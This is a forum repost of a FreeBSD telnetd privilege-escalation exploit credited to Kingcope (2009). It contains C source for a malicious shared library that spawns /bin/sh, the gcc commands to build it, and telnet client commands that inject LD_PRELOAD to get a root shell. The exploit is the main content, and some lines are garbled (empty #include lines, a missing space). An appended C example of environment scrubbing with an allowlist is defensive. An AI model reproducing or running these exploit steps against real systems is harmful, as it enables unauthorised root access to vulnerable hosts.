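FreeBSD 0day disclosed
Remote overflow possible, local privilege escalation possible. Source: 比特网 forum
I didn't expect that anyone would still be researching this; I admired it when I saw it. The problem is in the telnetd part. It passed testing on FreeBSD 7.0-RELEASE; 7.1 seems to have the same problem as well, but it has already been through testing. Interested readers can debug it. The code is as follows: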
# FreeBSD telnetd local/remote privilege escalation/code execution
# remote root only when accessible ftp or similar available
# tested on FreeBSD 7.0-RELEASE
# by Kingcope/2009
#include
#include
#include
#include
void _init() {
FILE *f;
setenv("LD_PRELOAD","", 1);
system("echoALEX-ALEX;/bin/sh");
}
---snip-----
Then we compile this stuff.
---snip-----
#gcc -o program.o -c program.c -fPIC
#gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles
---snip-----
Then we copy the file to a known location (local root exploit)
---snip-----
#cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
---snip-----
...or we upload the library through any other available attack vector.
After that we telnet to the remote or local FreeBSD telnet daemon
with setting the LD_PRELOAD environment variable to the known location
as a telnet option before.
---snip-----
#telnet
/>auth disable SRA
/>environ define LD_PRELOAD/tmp/libno_ex.so.1.0
/>open target
---snip-----
ALEX-ALEX
#ROOTSHELL
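
The root cause shown above is that a client-supplied LD_PRELOAD reaches a process started as root. As an added example (not part of the original post and not FreeBSD's own code), this is an allowlist-based environment scrub that a daemon can apply before starting a login process; the allowlist contents and the names env_allowed and scrub_env are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Assumed allowlist for this example: variables a login session may inherit
 * from a remote client. Everything else, including LD_PRELOAD, is dropped. */
static const char *const allowed[] = {
    "TERM=", "DISPLAY=", "LOGNAME=", "PRINTER=", NULL
};

/* Return 1 if the "NAME=value" entry may be passed on to login. */
static int env_allowed(const char *entry)
{
    for (size_t i = 0; allowed[i] != NULL; i++) {
        if (strncmp(entry, allowed[i], strlen(allowed[i])) == 0)
            return 1;
    }
    return 0;
}

/* Compact a NULL-terminated environment vector in place, keeping only
 * allowlisted entries. Returns the number of entries removed. */
int scrub_env(char **envp)
{
    char **dst = envp;
    int removed = 0;
    for (char **src = envp; *src != NULL; src++) {
        if (env_allowed(*src))
            *dst++ = *src;
        else
            removed++;
    }
    *dst = NULL;
    return removed;
}

int main(void)
{
    /* Constructed sample: variables a client could send as telnet options. */
    char *env[] = {
        "TERM=xterm", "LD_PRELOAD=/tmp/libno_ex.so.1.0",
        "LD_LIBRARY_PATH=/tmp", "DISPLAY=:0", NULL
    };
    int n = scrub_env(env);
    printf("removed %d entries\n", n);
    for (char **e = env; *e != NULL; e++)
        printf("kept: %s\n", *e);
    return 0;
}
```

An allowlist is used rather than a list of known-bad names so that loader variables not anticipated by the author are dropped as well.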